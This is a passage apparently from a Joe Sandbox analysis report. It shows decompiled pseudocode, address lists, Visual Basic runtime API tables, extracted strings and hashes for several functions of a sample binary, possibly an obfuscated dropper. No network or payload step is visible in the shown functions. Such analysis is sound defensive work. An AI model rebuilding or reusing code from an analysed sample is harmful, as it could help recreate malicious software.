					_v100 = L"Enamelware3";
					_v108 = 8;
					L004018FC();
					_push(0x2f);
					_push( &_v72);
					_push( &_v88);
					L004017DC();
					_push( &_v88);
					L00401908();
					L0040192C();
					_push( &_v88);
					_push( &_v72);
					_push(2);
					L004018F6();
					_v100 = L"Brkningens";
					_v108 = 8;
					L004018FC();
					_push(0);
					_push(0x80);
					_push( &_v72);
					_push( &_v88);
					L00401740();
					_push( &_v88);
					_push( &_v92);
					L00401722();
					_push( &_v92);
					_push( &_v32);
					L00401728();
					_push( &_v88);
					_push( &_v72);
					_push(2);
					L004018F6();
					if( *0x427544 != 0) {
						_v140 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v140 = 0x427544;
					}
					_t39 =  &_v140; // 0x427544
					_v116 =  *((intOrPtr*)( *_t39));
					_t41 =  &_v56; // 0x427544
					_t102 =  *((intOrPtr*)( *_v116 + 0x14))(_v116, _t41);
					asm("fclex");
					_v120 = _t102;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v116);
						_push(_v120);
						L0040193E();
						_v144 = _t102;
					}
					_v124 = _v56;
					_t107 =  *((intOrPtr*)( *_v124 + 0x118))(_v124,  &_v112);
					asm("fclex");
					_v128 = _t107;
					if(_v128 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x403c2c);
						_push(_v124);
						_push(_v128);
						L0040193E();
						_v148 = _t107;
					}
					L0040173A();
					_v36 = _t107;
					L004018A2();
				}
				_v40 = 0x68f04a;
				asm("wait");
				_push(0x424ca3);
				L004018E4();
				_t83 =  &_v32;
				_push(_t83);
				_push(0);
				L004017A0();
				L004018E4();
				return _t83;
			}

0x00424a20
0x00424a2f
0x00424a39
0x00424a41
0x00424a44
0x00424a4b
0x00424a5a
0x00424a63
0x00424a68
0x00424a6d
0x00424a77
0x00424a7c
0x00424a83
0x00424a88
0x00424a89
0x00424a8c
0x00424a96
0x00424a9b
0x00424a9c
0x00424aa3
0x00424aa9
0x00424ab0
0x00424ab4
0x00424ab5
0x00424ab7
0x00424ac5
0x00424acb
0x00424ad2
0x00424adf
0x00424ae4
0x00424ae9
0x00424aed
0x00424aee
0x00424af6
0x00424af7
0x00424b01
0x00424b09
0x00424b0d
0x00424b0e
0x00424b10
0x00424b18
0x00424b1f
0x00424b2c
0x00424b31
0x00424b33
0x00424b3b
0x00424b3f
0x00424b40
0x00424b48
0x00424b4c
0x00424b4d
0x00424b55
0x00424b59
0x00424b5a
0x00424b62
0x00424b66
0x00424b67
0x00424b69
0x00424b78
0x00424b95
0x00424b7a
0x00424b7a
0x00424b7f
0x00424b84
0x00424b89
0x00424b89
0x00424b9f
0x00424ba7
0x00424baa
0x00424bb6
0x00424bb9
0x00424bbb
0x00424bc2
0x00424bde
0x00424bc4
0x00424bc4
0x00424bc6
0x00424bcb
0x00424bce
0x00424bd1
0x00424bd6
0x00424bd6
0x00424be8
0x00424bf7
0x00424bfd
0x00424bff
0x00424c06
0x00424c25
0x00424c08
0x00424c08
0x00424c0d
0x00424c12
0x00424c15
0x00424c18
0x00424c1d
0x00424c1d
0x00424c2f
0x00424c34
0x00424c3b
0x00424c3b
0x00424c40
0x00424c47
0x00424c48
0x00424c8a
0x00424c8f
0x00424c92
0x00424c93
0x00424c95
0x00424c9d
0x00424ca2

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00424A39
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00424A63
__vbaStrI4.MSVBVM60(003EF48C,?,?,?,?,004015F6), ref: 00424A6D
__vbaStrMove.MSVBVM60(003EF48C,?,?,?,?,004015F6), ref: 00424A77
__vbaFPFix.MSVBVM60(00000000,003EF48C,?,?,?,?,004015F6), ref: 00424A83
__vbaStrR4.MSVBVM60(?,00000000,003EF48C,?,?,?,?,004015F6), ref: 00424A8C
__vbaStrMove.MSVBVM60(?,00000000,003EF48C,?,?,?,?,004015F6), ref: 00424A96
__vbaStrCmp.MSVBVM60(00000000,?,00000000,003EF48C,?,?,?,?,004015F6), ref: 00424A9C
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,00000000,?,00000000,003EF48C,?,?,?,?,004015F6), ref: 00424AB7
__vbaVarDup.MSVBVM60 ref: 00424ADF
#619.MSVBVM60(?,?,0000002F), ref: 00424AEE
__vbaStrVarMove.MSVBVM60(?,?,?,0000002F), ref: 00424AF7
__vbaStrMove.MSVBVM60(?,?,?,0000002F), ref: 00424B01
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,0000002F), ref: 00424B10
__vbaVarDup.MSVBVM60 ref: 00424B2C
#717.MSVBVM60(?,?,00000080,00000000), ref: 00424B40
__vbaVar2Vec.MSVBVM60(?,?,?,?,00000080,00000000), ref: 00424B4D
__vbaAryMove.MSVBVM60(?,?,?,?,?,?,00000080,00000000), ref: 00424B5A
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00424B69
__vbaNew2.MSVBVM60(00403C1C,00427544,?,?,?,?,?,?,?,?,004015F6), ref: 00424B84
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00424BD1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00424C18
__vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00424C2F
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00424C3B
__vbaFreeStr.MSVBVM60(00424CA3), ref: 00424C8A
__vbaAryDestruct.MSVBVM60(00000000,?,00424CA3), ref: 00424C95
__vbaFreeStr.MSVBVM60(00000000,?,00424CA3), ref: 00424C9D

Strings

Brkningens, xrefs: 00424B18
Enamelware3, xrefs: 00424ACB
DuB, xrefs: 00424BAA, 00424BAD
DuB, xrefs: 00424B9F

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#619#717ChkstkCopyDestructNew2Var2
String ID: Brkningens$DuB$DuB$Enamelware3
API String ID: 1076052315-670747076
Opcode ID: aace4e2df6a8da6e8bf6a129aff83b7fbcaff1b2554234de0e2017a6cd0c2c53
Instruction ID: 91708f5cd7f831ac8d45fee594fe96f3e9d5525b0ee2a48ee0e495f857c2622b
Opcode Fuzzy Hash: aace4e2df6a8da6e8bf6a129aff83b7fbcaff1b2554234de0e2017a6cd0c2c53
Instruction Fuzzy Hash: FA61EC71940218ABDB10EFE1D945FDEBBB8AF04704F50813AF105BB1A2DB789A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00422CE9, Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00422CE9(void* __ebx, void* __ecx, void* __edi, void* __esi, signed long long __fp0, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				short _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				char _v52;
				char _v68;
				signed long long _v92;
				char _v100;
				char _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed char _t96;
				short _t99;
				char* _t101;
				signed int _t111;
				signed int _t116;
				signed int _t122;
				signed int _t127;
				intOrPtr _t149;
				signed long long _t151;

				_t151 = __fp0;
				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t149;
				L004015F0();
				_v12 = _t149;
				_v8 = 0x4014a0;
				L004018DE();
				_push(1);
				_push(2);
				_push(0x125);
				_t96 =  &_v68;
				_push(_t96);
				L00401746();
				asm("fld1");
				if( *0x427000 != 0) {
					_push( *0x40149c);
					_push( *0x401498);
					L00401614();
				} else {
					__fp0 = __fp0 /  *0x401498;
				}
				if( *0x427000 != 0) {
					_push( *0x40149c);
					_push( *0x401498);
					L00401614();
				} else {
					_t151 = _t151 /  *0x401498;
				}
				_v92 = _t151;
				asm("fnstsw ax");
				if((_t96 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				_v100 = 0x8005;
				_push( &_v68);
				_t99 =  &_v100;
				_push(_t99);
				L00401794();
				_v108 = _t99;
				L00401938();
				if(_v108 != 0) {
					_v92 =  &_v24;
					_v100 = 0x6011;
					_push(0);
					_push(0x40);
					_push( &_v100);
					_push( &_v68);
					L00401740();
					_push( &_v68);
					L00401908();
					L0040192C();
					L00401938();
					if( *0x427544 != 0) {
						_v132 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v132 = 0x427544;
					}
					_t25 =  &_v132; // 0x427544
					_v108 =  *((intOrPtr*)( *_t25));
					_t111 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v52);
					asm("fclex");
					_v112 = _t111;
					if(_v112 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v108);
						_push(_v112);
						L0040193E();
						_v136 = _t111;
					}
					_v116 = _v52;
					_t116 =  *((intOrPtr*)( *_v116 + 0x118))(_v116,  &_v104);
					asm("fclex");
					_v120 = _t116;
					if(_v120 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x403c2c);
						_push(_v116);
						_push(_v120);
						L0040193E();
						_v140 = _t116;
					}
					L0040173A();
					_v36 = _t116;
					L004018A2();
					if( *0x427544 != 0) {
						_v144 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v144 = 0x427544;
					}
					_t56 =  &_v144; // 0x427544
					_v108 =  *((intOrPtr*)( *_t56));
					_t122 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v52);
					asm("fclex");
					_v112 = _t122;
					if(_v112 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v108);
						_push(_v112);
						L0040193E();
						_v148 = _t122;
					}
					_v116 = _v52;
					_t127 =  *((intOrPtr*)( *_v116 + 0xd8))(_v116,  &_v48);
					asm("fclex");
					_v120 = _t127;
					if(_v120 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0xd8);
						_push(0x403c2c);
						_push(_v116);
						_push(_v120);
						L0040193E();
						_v152 = _t127;
					}
					_v128 = _v48;
					_v48 = _v48 & 0x00000000;
					L0040192C();
					L004018A2();
				}
				_v28 = 0x6e5d;
				asm("wait");
				_push(0x422fe0);
				_t101 =  &_v24;
				_push(_t101);
				_push(0);
				L004017A0();
				L004018E4();
				L004018E4();
				L004018E4();
				return _t101;
			}

0x00422ce9
0x00422cee
0x00422cf9
0x00422cfa
0x00422d06
0x00422d0e
0x00422d11
0x00422d1e
0x00422d23
0x00422d25
0x00422d27
0x00422d2c
0x00422d2f
0x00422d30
0x00422d35
0x00422d3e
0x00422d48
0x00422d4e
0x00422d54
0x00422d40
0x00422d40
0x00422d40
0x00422d60
0x00422d6a
0x00422d70
0x00422d76
0x00422d62
0x00422d62
0x00422d62
0x00422d7b
0x00422d7e
0x00422d82
0x004015fc
0x004015fc
0x00422d88
0x00422d92
0x00422d93
0x00422d96
0x00422d97
0x00422d9c
0x00422da3
0x00422dae
0x00422db7
0x00422dba
0x00422dc1
0x00422dc3
0x00422dc8
0x00422dcc
0x00422dcd
0x00422dd5
0x00422dd6
0x00422de0
0x00422de8
0x00422df4
0x00422e0e
0x00422df6
0x00422df6
0x00422dfb
0x00422e00
0x00422e05
0x00422e05
0x00422e15
0x00422e1a
0x00422e29
0x00422e2c
0x00422e2e
0x00422e35
0x00422e51
0x00422e37
0x00422e37
0x00422e39
0x00422e3e
0x00422e41
0x00422e44
0x00422e49
0x00422e49
0x00422e5b
0x00422e6a
0x00422e70
0x00422e72
0x00422e79
0x00422e98
0x00422e7b
0x00422e7b
0x00422e80
0x00422e85
0x00422e88
0x00422e8b
0x00422e90
0x00422e90
0x00422ea2
0x00422ea7
0x00422eae
0x00422eba
0x00422ed7
0x00422ebc
0x00422ebc
0x00422ec1
0x00422ec6
0x00422ecb
0x00422ecb
0x00422ee1
0x00422ee9
0x00422ef8
0x00422efb
0x00422efd
0x00422f04
0x00422f20
0x00422f06
0x00422f06
0x00422f08
0x00422f0d
0x00422f10
0x00422f13
0x00422f18
0x00422f18
0x00422f2a
0x00422f39
0x00422f3f
0x00422f41
0x00422f48
0x00422f67
0x00422f4a
0x00422f4a
0x00422f4f
0x00422f54
0x00422f57
0x00422f5a
0x00422f5f
0x00422f5f
0x00422f71
0x00422f74
0x00422f7e
0x00422f86
0x00422f86
0x00422f8b
0x00422f91
0x00422f92
0x00422fbc
0x00422fbf
0x00422fc0
0x00422fc2
0x00422fca
0x00422fd2
0x00422fda
0x00422fdf

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00422D06
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00422D1E
#538.MSVBVM60(?,00000125,00000002,00000001,?,?,?,?,004015F6), ref: 00422D30
_adj_fdiv_m64.MSVBVM60(?,00000125,00000002,00000001,?,?,?,?,004015F6), ref: 00422D54
_adj_fdiv_m64.MSVBVM60(?,00000125,00000002,00000001,?,?,?,?,004015F6), ref: 00422D76
__vbaVarTstGe.MSVBVM60(00008005,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00422D97
__vbaFreeVar.MSVBVM60(00008005,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00422DA3
#717.MSVBVM60(?,00006011,00000040,00000000,00008005,?), ref: 00422DCD
__vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000,00008005,?), ref: 00422DD6
__vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000,00008005,?), ref: 00422DE0
__vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000,00008005,?), ref: 00422DE8
__vbaNew2.MSVBVM60(00403C1C,00427544,?,?,00006011,00000040,00000000,00008005,?), ref: 00422E00
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00422E44
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00422E8B
__vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00422EA2
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00422EAE
__vbaNew2.MSVBVM60(00403C1C,00427544), ref: 00422EC6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00422F13
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,000000D8), ref: 00422F5A
__vbaStrMove.MSVBVM60(00000000,?,00403C2C,000000D8), ref: 00422F7E
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,000000D8), ref: 00422F86
__vbaAryDestruct.MSVBVM60(00000000,?,00422FE0,00008005,?), ref: 00422FC2
__vbaFreeStr.MSVBVM60(00000000,?,00422FE0,00008005,?), ref: 00422FCA
__vbaFreeStr.MSVBVM60(00000000,?,00422FE0,00008005,?), ref: 00422FD2
__vbaFreeStr.MSVBVM60(00000000,?,00422FE0,00008005,?), ref: 00422FDA

Strings

]n, xrefs: 00422F8B
DuB, xrefs: 00422E15
DuB, xrefs: 00422EE1

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Move$New2_adj_fdiv_m64$#538#717ChkstkCopyDestruct
String ID: DuB$DuB$]n
API String ID: 499695664-2417534752
Opcode ID: 7fee2e79c741a8391c3957704782dcf80fa34db9c21a1954f82b6c53fe1a879a
Instruction ID: 46e926860ea133417623d503309bb6748635725ea68a8fae88d23343af3a02fb
Opcode Fuzzy Hash: 7fee2e79c741a8391c3957704782dcf80fa34db9c21a1954f82b6c53fe1a879a
Instruction Fuzzy Hash: 9A810571A40228EFDB10EFA5DE45BEDBBB4BF08304F50406AE105BB2A1DB785A45DF18

Uniqueness

Uniqueness Score: -1.00%

Function 00425574, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00425574(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v32;
				short _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
				char* _v108;
				intOrPtr _v116;
				void* _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _t78;
				short _t83;
				signed int _t96;
				signed int _t101;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t123 = _t122 - 0x10;
				 *[fs:0x0] = _t123;
				L004015F0();
				_v20 = _t123;
				_v16 = 0x401588;
				_v12 = 0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015f6, _t120);
				L00401704();
				_v32 = __fp0;
				_v60 = 0x4eb0fb;
				_v68 = 3;
				_t78 =  &_v68;
				_push(_t78);
				L004016B6();
				L0040192C();
				_push(_t78);
				_push(L"HECKLER");
				L00401734();
				asm("sbb eax, eax");
				_v136 =  ~( ~_t78 + 1);
				L004018E4();
				L00401938();
				if(_v136 != 0) {
					_v76 = 7;
					_v84 = 2;
					_v108 = L"forskrkkelserne";
					_v116 = 8;
					L004018FC();
					_push( &_v84);
					_push(0xc2);
					_push( &_v68);
					_push( &_v100);
					L004017D6();
					_push( &_v100);
					L00401908();
					L0040192C();
					_push( &_v100);
					_push( &_v84);
					_push( &_v68);
					_push(3);
					L004018F6();
					if( *0x427544 != 0) {
						_v168 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v168 = 0x427544;
					}
					_t33 =  &_v168; // 0x427544
					_v136 =  *((intOrPtr*)( *_t33));
					_t96 =  *((intOrPtr*)( *_v136 + 0x14))(_v136,  &_v52);
					asm("fclex");
					_v140 = _t96;
					if(_v140 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v136);
						_push(_v140);
						L0040193E();
						_v172 = _t96;
					}
					_v144 = _v52;
					_t101 =  *((intOrPtr*)( *_v144 + 0x130))(_v144,  &_v48);
					asm("fclex");
					_v148 = _t101;
					if(_v148 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x403c2c);
						_push(_v144);
						_push(_v148);
						L0040193E();
						_v176 = _t101;
					}
					_v164 = _v48;
					_v48 = _v48 & 0x00000000;
					L0040192C();
					L004018A2();
					_push(0);
					L004017FA();
				}
				_v60 = 0x80020004;
				_v68 = 0xa;
				_t83 =  &_v68;
				_push(_t83);
				L004018BA();
				_v36 = _t83;
				L00401938();
				asm("wait");
				_push(0x4257f6);
				L004018E4();
				L004018E4();
				return _t83;
			}

0x00425577
0x00425586
0x00425592
0x0042559a
0x0042559d
0x004255a4
0x004255ab
0x004255ba
0x004255bd
0x004255c2
0x004255c5
0x004255cc
0x004255d3
0x004255d6
0x004255d7
0x004255e1
0x004255e6
0x004255e7
0x004255ec
0x004255f3
0x004255f8
0x00425602
0x0042560a
0x00425618
0x0042561e
0x00425625
0x0042562c
0x00425633
0x00425640
0x00425648
0x00425649
0x00425651
0x00425655
0x00425656
0x0042565e
0x0042565f
0x00425669
0x00425671
0x00425675
0x00425679
0x0042567a
0x0042567c
0x0042568b
0x004256a8
0x0042568d
0x0042568d
0x00425692
0x00425697
0x0042569c
0x0042569c
0x004256b2
0x004256ba
0x004256d2
0x004256d5
0x004256d7
0x004256e4
0x00425706
0x004256e6
0x004256e6
0x004256e8
0x004256ed
0x004256f3
0x004256f9
0x004256fe
0x004256fe
0x00425710
0x00425728
0x0042572e
0x00425730
0x0042573d
0x00425762
0x0042573f
0x0042573f
0x00425744
0x00425749
0x0042574f
0x00425755
0x0042575a
0x0042575a
0x0042576c
0x00425772
0x0042577f
0x00425787
0x0042578c
0x0042578e
0x0042578e
0x00425793
0x0042579a
0x004257a1
0x004257a4
0x004257a5
0x004257aa
0x004257b1
0x004257b6
0x004257b7
0x004257e8
0x004257f0
0x004257f5

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00425592
#535.MSVBVM60(?,?,?,?,004015F6), ref: 004255BD
#574.MSVBVM60(00000003), ref: 004255D7
__vbaStrMove.MSVBVM60(00000003), ref: 004255E1
__vbaStrCmp.MSVBVM60(HECKLER,00000000,00000003), ref: 004255EC
__vbaFreeStr.MSVBVM60(HECKLER,00000000,00000003), ref: 00425602
__vbaFreeVar.MSVBVM60(HECKLER,00000000,00000003), ref: 0042560A
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,HECKLER,00000000,00000003), ref: 00425640
#632.MSVBVM60(?,00000003,000000C2,?,?,?,?,?,?,?,?,?,?,HECKLER,00000000,00000003), ref: 00425656
__vbaStrVarMove.MSVBVM60(?,?,00000003,000000C2,?,?,?,?,?,?,?,?,?,?,HECKLER,00000000), ref: 0042565F
__vbaStrMove.MSVBVM60(?,?,00000003,000000C2,?,?,?,?,?,?,?,?,?,?,HECKLER,00000000), ref: 00425669
__vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,?,?,00000003,000000C2,?), ref: 0042567C
__vbaNew2.MSVBVM60(00403C1C,00427544,?,?,?,004015F6), ref: 00425697
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 004256F9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000130), ref: 00425755
__vbaStrMove.MSVBVM60 ref: 0042577F
__vbaFreeObj.MSVBVM60 ref: 00425787
__vbaOnError.MSVBVM60(00000000), ref: 0042578E
#648.MSVBVM60(0000000A,HECKLER,00000000,00000003), ref: 004257A5
__vbaFreeVar.MSVBVM60(0000000A,HECKLER,00000000,00000003), ref: 004257B1
__vbaFreeStr.MSVBVM60(004257F6,0000000A,HECKLER,00000000,00000003), ref: 004257E8
__vbaFreeStr.MSVBVM60(004257F6,0000000A,HECKLER,00000000,00000003), ref: 004257F0

Strings

DuB, xrefs: 004256B2
HECKLER, xrefs: 004255E7
forskrkkelserne, xrefs: 0042562C

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$Move$CheckHresult$#535#574#632#648ChkstkErrorListNew2
String ID: DuB$HECKLER$forskrkkelserne
API String ID: 1000924570-2406200853
Opcode ID: 9373a1485bf9ba3993a2320b00f5635aa4732b8fef3289d839503261421eaf44
Instruction ID: 15e2b4e6afc003c1e9a3cf0eac397a5d29980e36a9ea3acd357efe9535629327
Opcode Fuzzy Hash: 9373a1485bf9ba3993a2320b00f5635aa4732b8fef3289d839503261421eaf44
Instruction Fuzzy Hash: B7610871A40228EFDB10EFA5CC95BDEB7B4BF04304F5080AAE145B72A1DB785A45CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004258FC, Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E004258FC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				short _v32;
				void* _v36;
				signed int _v40;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char* _v116;
				intOrPtr _v124;
				void* _v128;
				void* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				signed int _v168;
				char _v172;
				signed int _v176;
				signed int _v180;
				short _t99;
				signed int _t103;
				signed int _t109;
				signed int _t114;
				signed int _t121;
				signed int _t126;
				void* _t140;
				void* _t142;
				intOrPtr _t143;

				_t143 = _t142 - 0xc;
				 *[fs:0x0] = _t143;
				L004015F0();
				_v16 = _t143;
				_v12 = 0x4015a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015f6, _t140);
				_push(0xa1);
				_push( &_v60);
				L00401698();
				_v116 = L"Barografer";
				_v124 = 8;
				L004018FC();
				_push( &_v76);
				_push( &_v92);
				L004018D8();
				_push( &_v60);
				_t99 =  &_v92;
				_push(_t99);
				L0040175E();
				_v132 = _t99;
				_push( &_v92);
				_push( &_v60);
				_push( &_v76);
				_push(3);
				L004018F6();
				_t103 = _v132;
				if(_t103 != 0) {
					if( *0x427544 != 0) {
						_v160 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v160 = 0x427544;
					}
					_t23 =  &_v160; // 0x427544
					_v132 =  *((intOrPtr*)( *_t23));
					_t109 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
					asm("fclex");
					_v136 = _t109;
					if(_v136 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v132);
						_push(_v136);
						L0040193E();
						_v164 = _t109;
					}
					_v140 = _v44;
					_t114 =  *((intOrPtr*)( *_v140 + 0x140))(_v140,  &_v128);
					asm("fclex");
					_v144 = _t114;
					if(_v144 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x403c2c);
						_push(_v140);
						_push(_v144);
						L0040193E();
						_v168 = _t114;
					}
					_v32 = _v128;
					L004018A2();
					_push(0x5c);
					_push(L"Jonbytningens");
					L004018CC();
					L0040192C();
					if( *0x427544 != 0) {
						_v172 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v172 = 0x427544;
					}
					_t55 =  &_v172; // 0x427544
					_v132 =  *((intOrPtr*)( *_t55));
					_t121 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
					asm("fclex");
					_v136 = _t121;
					if(_v136 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v132);
						_push(_v136);
						L0040193E();
						_v176 = _t121;
					}
					_v140 = _v44;
					_t126 =  *((intOrPtr*)( *_v140 + 0xf8))(_v140,  &_v40);
					asm("fclex");
					_v144 = _t126;
					if(_v144 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x403c2c);
						_push(_v140);
						_push(_v144);
						L0040193E();
						_v180 = _t126;
					}
					_t103 = _v40;
					_v156 = _t103;
					_v40 = _v40 & 0x00000000;
					L0040192C();
					L004018A2();
				}
				_push(0x425be3);
				L004018E4();
				L004018E4();
				return _t103;
			}

0x004258ff
0x0042590e
0x0042591a
0x00425922
0x00425925
0x0042592c
0x0042593b
0x0042593e
0x00425946
0x00425947
0x0042594c
0x00425953
0x00425960
0x00425968
0x0042596c
0x0042596d
0x00425975
0x00425976
0x00425979
0x0042597a
0x0042597f
0x00425986
0x0042598a
0x0042598e
0x0042598f
0x00425991
0x00425999
0x0042599f
0x004259ac
0x004259c9
0x004259ae
0x004259ae
0x004259b3
0x004259b8
0x004259bd
0x004259bd
0x004259d3
0x004259db
0x004259ea
0x004259ed
0x004259ef
0x004259fc
0x00425a1b
0x004259fe
0x004259fe
0x00425a00
0x00425a05
0x00425a08
0x00425a0e
0x00425a13
0x00425a13
0x00425a25
0x00425a3d
0x00425a43
0x00425a45
0x00425a52
0x00425a77
0x00425a54
0x00425a54
0x00425a59
0x00425a5e
0x00425a64
0x00425a6a
0x00425a6f
0x00425a6f
0x00425a82
0x00425a89
0x00425a8e
0x00425a90
0x00425a95
0x00425a9f
0x00425aab
0x00425ac8
0x00425aad
0x00425aad
0x00425ab2
0x00425ab7
0x00425abc
0x00425abc
0x00425ad2
0x00425ada
0x00425ae9
0x00425aec
0x00425aee
0x00425afb
0x00425b1a
0x00425afd
0x00425afd
0x00425aff
0x00425b04
0x00425b07
0x00425b0d
0x00425b12
0x00425b12
0x00425b24
0x00425b3c
0x00425b42
0x00425b44
0x00425b51
0x00425b76
0x00425b53
0x00425b53
0x00425b58
0x00425b5d
0x00425b63
0x00425b69
0x00425b6e
